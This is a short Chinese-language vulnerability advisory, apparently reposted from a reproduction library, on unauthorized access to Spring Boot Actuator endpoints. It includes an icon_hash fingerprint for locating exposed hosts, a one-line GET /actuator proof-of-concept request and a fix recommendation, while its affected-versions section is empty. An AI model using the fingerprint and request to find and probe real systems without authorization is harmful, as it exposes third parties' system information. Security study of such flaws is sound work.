文章总结: 本文档分析SpringBootActuator未授权访问漏洞,指出因端点错误配置可能导致信息泄露及RCE风险。文中提供了资产测绘指纹icon_hash及GET请求POC用于复现,建议用户升级至最新版本或启用身份验证与授权以修复该安全问题。 综合评分: 75 文章分类: 漏洞POC,WEB安全,漏洞预警
Spring Boot Actuator未授权访问漏洞
原创
安服仔 安服仔
北风漏洞复现文库
2026年1月22日 10:11 广东
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
#
#
01
—
漏洞名称
Spring Boot Actuator未授权访问漏洞
02
—
影响版本
03
—
漏洞简介
Actuator是Spring Boot提供的服务监控和管理中间件。当Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。而由于对这些端点的错误配置,就有可能导致一些系统信息泄露、XXE、甚至是RCE等安全问题。
04
—
资产测绘
icon_hash="116323821"
05
—
漏洞复现
POC
GET /actuator HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Charset: utf-8
06
—
修复建议
升级到最新版本或者启用身份验证与授权
07
—
往期回顾
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北风漏洞复现文库 安服仔 安服仔《Spring Boot Actuator未授权访问漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论